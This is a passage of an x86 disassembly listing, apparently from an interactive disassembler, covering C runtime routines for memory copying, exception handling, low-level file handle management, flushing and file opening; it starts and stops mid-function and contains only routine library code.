jmp off_41F0D0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41F060
dd offset loc_41F08C
dd offset loc_41F0B0
; ---------------------------------------------------------------------------
loc_41F060: ; DATA XREF: sub_41EFF0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41F04C
rep movsd
jmp off_41F13C[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41F08C: ; DATA XREF: sub_41EFF0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41F04C
rep movsd
jmp off_41F13C[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41F0B0: ; DATA XREF: sub_41EFF0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41F04C
rep movsd
jmp off_41F13C[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41F0D0 dd offset loc_41F133 ; DATA XREF: sub_41EFF0:loc_41F04C�r
dd offset loc_41F120
dd offset loc_41F118
dd offset loc_41F110
dd offset loc_41F108
dd offset loc_41F100
dd offset loc_41F0F8
dd offset loc_41F0F0
; ---------------------------------------------------------------------------
loc_41F0F0: ; CODE XREF: sub_41EFF0:loc_41F04C�j
; DATA XREF: sub_41EFF0+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41F0F8: ; CODE XREF: sub_41EFF0:loc_41F04C�j
; DATA XREF: sub_41EFF0+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41F100: ; CODE XREF: sub_41EFF0:loc_41F04C�j
; DATA XREF: sub_41EFF0+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41F108: ; CODE XREF: sub_41EFF0:loc_41F04C�j
; DATA XREF: sub_41EFF0+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41F110: ; CODE XREF: sub_41EFF0:loc_41F04C�j
; DATA XREF: sub_41EFF0+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41F118: ; CODE XREF: sub_41EFF0:loc_41F04C�j
; DATA XREF: sub_41EFF0+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41F120: ; CODE XREF: sub_41EFF0:loc_41F04C�j
; DATA XREF: sub_41EFF0+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41F133: ; CODE XREF: sub_41EFF0:loc_41F04C�j
; DATA XREF: sub_41EFF0:off_41F0D0�o
jmp off_41F13C[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41F13C dd offset loc_41F14C ; DATA XREF: sub_41EFF0+35�r
; sub_41EFF0+92�r ...
dd offset loc_41F154
dd offset loc_41F160
dd offset loc_41F174
; ---------------------------------------------------------------------------
loc_41F14C: ; CODE XREF: sub_41EFF0+35�j
; sub_41EFF0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41F154: ; CODE XREF: sub_41EFF0+35�j
; sub_41EFF0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41F160: ; CODE XREF: sub_41EFF0+35�j
; sub_41EFF0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41F174: ; CODE XREF: sub_41EFF0+35�j
; sub_41EFF0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41F18C: ; CODE XREF: sub_41EFF0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41F1C0
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41F1B4
std
rep movsd
cld
jmp off_41F2D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41F1B4: ; CODE XREF: sub_41EFF0+1B5�j
; sub_41EFF0+210�j ...
neg ecx
jmp off_41F288[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41F1C0: ; CODE XREF: sub_41EFF0+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41F1D8
and eax, 3
sub ecx, eax
jmp dword ptr loc_41F1D8+4[eax*4]
; ---------------------------------------------------------------------------
loc_41F1D8: ; CODE XREF: sub_41EFF0+1DA�j
; DATA XREF: sub_41EFF0+1E1�r
jmp off_41F2D8[ecx*4]
; ---------------------------------------------------------------------------
align 10h
dd offset loc_41F1EB+1
dd offset loc_41F210
; ---------------------------------------------------------------------------
cmp dl, dh
inc ecx
loc_41F1EB: ; DATA XREF: sub_41EFF0+1F0�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_41F1B4
std
rep movsd
cld
jmp off_41F2D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41F210: ; DATA XREF: sub_41EFF0+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41F1B4
std
rep movsd
cld
jmp off_41F2D8[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41F1B4
std
rep movsd
cld
jmp off_41F2D8[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41F28C
dd offset loc_41F294
dd offset loc_41F29C
dd offset loc_41F2A4
dd offset loc_41F2AC
dd offset loc_41F2B4
dd offset loc_41F2BC
off_41F288 dd offset loc_41F2CF ; DATA XREF: sub_41EFF0+1C6�r
; ---------------------------------------------------------------------------
loc_41F28C: ; DATA XREF: sub_41EFF0+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41F294: ; DATA XREF: sub_41EFF0+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41F29C: ; DATA XREF: sub_41EFF0+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41F2A4: ; DATA XREF: sub_41EFF0+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41F2AC: ; DATA XREF: sub_41EFF0+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41F2B4: ; DATA XREF: sub_41EFF0+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41F2BC: ; DATA XREF: sub_41EFF0+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41F2CF: ; CODE XREF: sub_41EFF0+1C6�j
; DATA XREF: sub_41EFF0:off_41F288�o
jmp off_41F2D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41F2D8 dd offset loc_41F2E8 ; DATA XREF: sub_41EFF0+1BB�r
; sub_41EFF0:loc_41F1D8�r ...
dd offset loc_41F2F0
dd offset loc_41F300
dd offset loc_41F314
; ---------------------------------------------------------------------------
loc_41F2E8: ; CODE XREF: sub_41EFF0+1BB�j
; sub_41EFF0:loc_41F1D8�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41F2F0: ; CODE XREF: sub_41EFF0+1BB�j
; sub_41EFF0:loc_41F1D8�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41F300: ; CODE XREF: sub_41EFF0+1BB�j
; sub_41EFF0:loc_41F1D8�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41F314: ; CODE XREF: sub_41EFF0+1BB�j
; sub_41EFF0:loc_41F1D8�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41EFF0 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F338 proc near ; DATA XREF: __SEH_prolog�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41F3D8
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41F36B: ; CODE XREF: sub_41F338+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41F3D1
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41F3BF
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41F3BF
js short loc_41F3CA
mov edi, [ebx+8]
push ebx
call sub_417CF0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_417D32
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_417DC6
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41F3BF: ; CODE XREF: sub_41F338+40�j
; sub_41F338+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41F36B
; ---------------------------------------------------------------------------
loc_41F3CA: ; CODE XREF: sub_41F338+54�j
mov eax, 0
jmp short loc_41F3ED
; ---------------------------------------------------------------------------
loc_41F3D1: ; CODE XREF: sub_41F338+36�j
mov eax, 1
jmp short loc_41F3ED
; ---------------------------------------------------------------------------
loc_41F3D8: ; CODE XREF: sub_41F338+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_417D32
add esp, 8
pop ebp
mov eax, 1
loc_41F3ED: ; CODE XREF: sub_41F338+97�j
; sub_41F338+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41F338 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_417D32
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41F410 proc near ; CODE XREF: sub_41F885+220�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
cmp ecx, dword_4815D0
push esi
push edi
jnb short loc_41F473
mov eax, ecx
sar eax, 5
lea edi, ds:4815E0h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
cmp dword ptr [esi+eax], 0FFFFFFFFh
jnz short loc_41F473
cmp dword_432364, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41F469
sub ecx, 0
jz short loc_41F460
dec ecx
jz short loc_41F45B
dec ecx
jnz short loc_41F469
push ebx
push 0FFFFFFF4h
jmp short loc_41F463
; ---------------------------------------------------------------------------
loc_41F45B: ; CODE XREF: sub_41F410+41�j
push ebx
push 0FFFFFFF5h
jmp short loc_41F463
; ---------------------------------------------------------------------------
loc_41F460: ; CODE XREF: sub_41F410+3E�j
push ebx
push 0FFFFFFF6h
loc_41F463: ; CODE XREF: sub_41F410+49�j
; sub_41F410+4E�j
call dword_422150 ; SetStdHandle
loc_41F469: ; CODE XREF: sub_41F410+39�j
; sub_41F410+44�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_41F489
; ---------------------------------------------------------------------------
loc_41F473: ; CODE XREF: sub_41F410+C�j
; sub_41F410+2B�j
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41F489: ; CODE XREF: sub_41F410+61�j
pop edi
pop esi
retn
sub_41F410 endp
; =============== S U B R O U T I N E =======================================
sub_41F48C proc near ; CODE XREF: sub_41AD23+51�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp ecx, dword_4815D0
push esi
push edi
jnb short loc_41F4F2
mov eax, ecx
sar eax, 5
lea edi, ds:4815E0h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41F4F2
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41F4F2
cmp dword_432364, 1
jnz short loc_41F4E8
xor eax, eax
sub ecx, eax
jz short loc_41F4DF
dec ecx
jz short loc_41F4DA
dec ecx
jnz short loc_41F4E8
push eax
push 0FFFFFFF4h
jmp short loc_41F4E2
; ---------------------------------------------------------------------------
loc_41F4DA: ; CODE XREF: sub_41F48C+44�j
push eax
push 0FFFFFFF5h
jmp short loc_41F4E2
; ---------------------------------------------------------------------------
loc_41F4DF: ; CODE XREF: sub_41F48C+41�j
push eax
push 0FFFFFFF6h
loc_41F4E2: ; CODE XREF: sub_41F48C+4C�j
; sub_41F48C+51�j
call dword_422150 ; SetStdHandle
loc_41F4E8: ; CODE XREF: sub_41F48C+3B�j
; sub_41F48C+47�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_41F508
; ---------------------------------------------------------------------------
loc_41F4F2: ; CODE XREF: sub_41F48C+C�j
; sub_41F48C+2D�j ...
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41F508: ; CODE XREF: sub_41F48C+64�j
pop edi
pop esi
retn
sub_41F48C endp
; =============== S U B R O U T I N E =======================================
sub_41F50B proc near ; CODE XREF: sub_41AD23+7�p
; sub_41AD23+1E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_4815D0
jnb short loc_41F535
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_4815E0[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
test byte ptr [eax+4], 1
jz short loc_41F535
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41F535: ; CODE XREF: sub_41F50B+A�j
; sub_41F50B+25�j
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
retn
sub_41F50B endp
; =============== S U B R O U T I N E =======================================
sub_41F54C proc near ; CODE XREF: sub_41ADA6+38�p
; sub_41B3E4+38�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
push esi
mov ecx, eax
sar ecx, 5
and eax, 1Fh
push edi
lea ebx, ds:4815E0h[ecx*4]
mov esi, [ebx]
lea edi, [eax+eax*8]
shl edi, 2
add esi, edi
cmp dword ptr [esi+8], 0
jnz short loc_41F5AB
push 0Ah
call sub_41A166
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_41F5A3
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41EF60
test eax, eax
pop ecx
pop ecx
jnz short loc_41F5A0
push 0Ah
call sub_41A0D2
pop ecx
xor eax, eax
jmp short loc_41F5BB
; ---------------------------------------------------------------------------
loc_41F5A0: ; CODE XREF: sub_41F54C+46�j
inc dword ptr [esi+8]
loc_41F5A3: ; CODE XREF: sub_41F54C+32�j
push 0Ah
call sub_41A0D2
pop ecx
loc_41F5AB: ; CODE XREF: sub_41F54C+24�j
mov eax, [ebx]
lea eax, [eax+edi+0Ch]
push eax
call dword_422018 ; RtlEnterCriticalSection
xor eax, eax
inc eax
loc_41F5BB: ; CODE XREF: sub_41F54C+52�j
pop edi
pop esi
pop ebx
retn
sub_41F54C endp
; =============== S U B R O U T I N E =======================================
sub_41F5BF proc near ; CODE XREF: sub_41AE1D+1�p
; sub_41B46B+1�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_4815E0[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+0Ch]
push eax
call dword_422014 ; RtlLeaveCriticalSection
retn
sub_41F5BF endp
; =============== S U B R O U T I N E =======================================
sub_41F5E1 proc near ; CODE XREF: sub_41F885:loc_41FA19�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
push ebp
push 0Bh
or ebp, 0FFFFFFFFh
call sub_41A0E7
test eax, eax
pop ecx
jz loc_41F728
push ebx
push esi
push edi
push 0Bh
call sub_41A166
xor ebx, ebx
pop ecx
mov [esp+18h+var_8], ebx
mov [esp+18h+var_4], ebx
mov edi, offset dword_4815E0
loc_41F611: ; CODE XREF: sub_41F5E1+D5�j
mov esi, [edi]
test esi, esi
jz loc_41F6C8
lea eax, [esi+480h]
jmp short loc_41F681
; ---------------------------------------------------------------------------
loc_41F623: ; CODE XREF: sub_41F5E1+A2�j
test byte ptr [esi+4], 1
jnz short loc_41F677
cmp dword ptr [esi+8], 0
jnz short loc_41F65C
push 0Ah
call sub_41A166
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_41F654
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41EF60
test eax, eax
pop ecx
pop ecx
jz short loc_41F6BE
inc dword ptr [esi+8]
loc_41F654: ; CODE XREF: sub_41F5E1+5A�j
push 0Ah
call sub_41A0D2
pop ecx
loc_41F65C: ; CODE XREF: sub_41F5E1+4C�j
lea ebx, [esi+0Ch]
push ebx
call dword_422018 ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_41F687
push ebx
call dword_422014 ; RtlLeaveCriticalSection
mov ebx, [esp+18h+var_8]
loc_41F677: ; CODE XREF: sub_41F5E1+46�j
mov eax, [edi]
add esi, 24h
add eax, 480h
loc_41F681: ; CODE XREF: sub_41F5E1+40�j
cmp esi, eax
jb short loc_41F623
jmp short loc_41F6A3
; ---------------------------------------------------------------------------
loc_41F687: ; CODE XREF: sub_41F5E1+89�j
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, [edi]
push 24h
cdq
pop ecx
idiv ecx
mov ebp, eax
add ebp, [esp+18h+var_4]
cmp ebp, 0FFFFFFFFh
jnz short loc_41F71D
mov ebx, [esp+18h+var_8]
loc_41F6A3: ; CODE XREF: sub_41F5E1+A4�j
add [esp+18h+var_4], 20h
inc ebx
add edi, 4
cmp edi, offset dword_4816E0
mov [esp+18h+var_8], ebx
jl loc_41F611
jmp short loc_41F71D
; ---------------------------------------------------------------------------
loc_41F6BE: ; CODE XREF: sub_41F5E1+6E�j
push 0Ah
call sub_41A0D2
pop ecx
jmp short loc_41F71A
; ---------------------------------------------------------------------------
loc_41F6C8: ; CODE XREF: sub_41F5E1+34�j
mov esi, 480h
push esi
call sub_416DAF
test eax, eax
pop ecx
jz short loc_41F71D
add dword_4815D0, 20h
lea ecx, ds:4815E0h[ebx*4]
mov [ecx], eax
lea edx, [eax+480h]
jmp short loc_41F706
; ---------------------------------------------------------------------------
loc_41F6F0: ; CODE XREF: sub_41F5E1+127�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 24h
add edx, esi
loc_41F706: ; CODE XREF: sub_41F5E1+10D�j
cmp eax, edx
jb short loc_41F6F0
shl ebx, 5
mov ebp, ebx
push ebp
call sub_41F54C
test eax, eax
pop ecx
jnz short loc_41F71D
loc_41F71A: ; CODE XREF: sub_41F5E1+E5�j
or ebp, 0FFFFFFFFh
loc_41F71D: ; CODE XREF: sub_41F5E1+BC�j
; sub_41F5E1+DB�j ...
push 0Bh
call sub_41A0D2
pop ecx
pop edi
pop esi
pop ebx
loc_41F728: ; CODE XREF: sub_41F5E1+10�j
mov eax, ebp
pop ebp
pop ecx
pop ecx
retn
sub_41F5E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F72E proc near ; CODE XREF: sub_41AEC9+1E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041F7D6 SIZE 00000014 BYTES
push 0Ch
push offset stru_42CB50
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_4815D0
jnb loc_41F7D6
mov eax, ebx
sar eax, 5
lea edi, ds:4815E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41F7D6
push ebx
call sub_41F54C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41F7AE
push ebx
call sub_41F50B
pop ecx
push eax
call dword_42214C ; FlushFileBuffers
test eax, eax
jnz short loc_41F79A
call dword_422004 ; RtlGetLastWin32Error
mov [ebp+var_1C], eax
jmp short loc_41F79E
; ---------------------------------------------------------------------------
loc_41F79A: ; CODE XREF: sub_41F72E+5F�j
and [ebp+var_1C], 0
loc_41F79E: ; CODE XREF: sub_41F72E+6A�j
cmp [ebp+var_1C], 0
jz short loc_41F7BD
call sub_41B93E
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_41F7AE: ; CODE XREF: sub_41F72E+4D�j
call sub_41B935
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_41F7BD: ; CODE XREF: sub_41F72E+74�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41F7CE
mov eax, [ebp+var_1C]
jmp short loc_41F7E4
sub_41F72E endp
; =============== S U B R O U T I N E =======================================
sub_41F7CB proc near ; DATA XREF: .text:stru_42CB50�o
mov ebx, [ebp+8]
sub_41F7CB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41F7CE proc near ; CODE XREF: sub_41F72E+93�p
push ebx
call sub_41F5BF
pop ecx
retn
sub_41F7CE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41F72E
loc_41F7D6: ; CODE XREF: sub_41F72E+15�j
; sub_41F72E+39�j
call sub_41B935
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
loc_41F7E4: ; CODE XREF: sub_41F72E+9B�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41F72E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B07E
loc_41F7EA: ; CODE XREF: sub_41B07E+E�j
push 10h
push offset stru_42CB60
call __SEH_prolog
xor ebx, ebx
mov [ebp-1Ch], ebx
push 1
call sub_41A166
pop ecx
mov [ebp-4], ebx
push 3
pop edi
loc_41F809: ; CODE XREF: sub_41B07E+47EA�j
mov [ebp-20h], edi
cmp edi, dword_482940
jge short loc_41F86A
mov esi, edi
shl esi, 2
mov eax, dword_481920
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_41F867
test byte ptr [eax+0Ch], 83h
jz short loc_41F83A
push eax
call sub_416E0D
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_41F83A
inc dword ptr [ebp-1Ch]
loc_41F83A: ; CODE XREF: sub_41B07E+47AB�j
; sub_41B07E+47B7�j
cmp edi, 14h
jl short loc_41F867
mov eax, dword_481920
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_422024 ; RtlDeleteCriticalSection
mov eax, dword_481920
push dword ptr [esi+eax]
call sub_416C97
pop ecx
mov eax, dword_481920
mov [esi+eax], ebx
loc_41F867: ; CODE XREF: sub_41B07E+47A5�j
; sub_41B07E+47BF�j
inc edi
jmp short loc_41F809
; ---------------------------------------------------------------------------
loc_41F86A: ; CODE XREF: sub_41B07E+4794�j
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_41F87C
mov eax, [ebp-1Ch]
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41B07E
; =============== S U B R O U T I N E =======================================
sub_41F87C proc near ; CODE XREF: sub_41B07E+47F0�p
; DATA XREF: .text:stru_42CB60�o
push 1
call sub_41A0D2
pop ecx
retn
sub_41F87C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F885 proc near ; CODE XREF: sub_41FB6C+28�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_C]
push ebx
push esi
xor esi, esi
test dl, dl
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], esi
jns short loc_41F8A9
mov [ebp+var_14], esi
mov [ebp+var_1], 10h
jmp short loc_41F8B4
; ---------------------------------------------------------------------------
loc_41F8A9: ; CODE XREF: sub_41F885+19�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41F8B4: ; CODE XREF: sub_41F885+22�j
mov eax, 8000h
test edx, eax
jnz short loc_41F8CE
test dh, 40h
jnz short loc_41F8CA
cmp dword_481598, eax
jz short loc_41F8CE
loc_41F8CA: ; CODE XREF: sub_41F885+3B�j
or [ebp+var_1], 80h
loc_41F8CE: ; CODE XREF: sub_41F885+36�j
; sub_41F885+43�j
push 3
mov eax, edx
pop ebx
and eax, ebx
sub eax, esi
jz short loc_41F8F1
dec eax
jz short loc_41F8E8
dec eax
jnz short loc_41F90C
mov [ebp+var_10], 0C0000000h
jmp short loc_41F8F8
; ---------------------------------------------------------------------------
loc_41F8E8: ; CODE XREF: sub_41F885+55�j
mov [ebp+var_10], 40000000h
jmp short loc_41F8F8
; ---------------------------------------------------------------------------
loc_41F8F1: ; CODE XREF: sub_41F885+52�j
mov [ebp+var_10], 80000000h
loc_41F8F8: ; CODE XREF: sub_41F885+61�j
; sub_41F885+6A�j
cmp ecx, 10h
jz short loc_41F93D
cmp ecx, 20h
jz short loc_41F934
cmp ecx, 30h
jz short loc_41F92B
cmp ecx, 40h
jz short loc_41F926
loc_41F90C: ; CODE XREF: sub_41F885+58�j
call sub_41B935
mov dword ptr [eax], 16h
call sub_41B93E
mov [eax], esi
or eax, 0FFFFFFFFh
jmp loc_41FB1D
; ---------------------------------------------------------------------------
loc_41F926: ; CODE XREF: sub_41F885+85�j
mov [ebp+var_8], ebx
jmp short loc_41F940
; ---------------------------------------------------------------------------
loc_41F92B: ; CODE XREF: sub_41F885+80�j
mov [ebp+var_8], 2
jmp short loc_41F940
; ---------------------------------------------------------------------------
loc_41F934: ; CODE XREF: sub_41F885+7B�j
mov [ebp+var_8], 1
jmp short loc_41F940
; ---------------------------------------------------------------------------
loc_41F93D: ; CODE XREF: sub_41F885+76�j
mov [ebp+var_8], esi
loc_41F940: ; CODE XREF: sub_41F885+A4�j
; sub_41F885+AD�j ...
mov eax, edx
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
push edi
mov edi, 100h
jg short loc_41F987
jz short loc_41F982
cmp eax, esi
jz short loc_41F982
cmp eax, edi
jz short loc_41F979
cmp eax, 200h
jz short loc_41F9B3
cmp eax, 300h
jnz short loc_41F999
mov [ebp+var_C], 2
jmp short loc_41F9C3
; ---------------------------------------------------------------------------
loc_41F979: ; CODE XREF: sub_41F885+DB�j
mov [ebp+var_C], 4
jmp short loc_41F9C3
; ---------------------------------------------------------------------------
loc_41F982: ; CODE XREF: sub_41F885+D3�j
; sub_41F885+D7�j
mov [ebp+var_C], ebx
jmp short loc_41F9C3
; ---------------------------------------------------------------------------
loc_41F987: ; CODE XREF: sub_41F885+D1�j
cmp eax, 500h
jz short loc_41F9BC
cmp eax, 600h
jz short loc_41F9B3
cmp eax, edx
jz short loc_41F9BC
loc_41F999: ; CODE XREF: sub_41F885+E9�j
call sub_41B935
mov dword ptr [eax], 16h
call sub_41B93E
mov [eax], esi
loc_41F9AB: ; CODE XREF: sub_41F885+2E2�j
or eax, 0FFFFFFFFh
jmp loc_41FB1C
; ---------------------------------------------------------------------------
loc_41F9B3: ; CODE XREF: sub_41F885+E2�j
; sub_41F885+10E�j
mov [ebp+var_C], 5
jmp short loc_41F9C3
; ---------------------------------------------------------------------------
loc_41F9BC: ; CODE XREF: sub_41F885+107�j
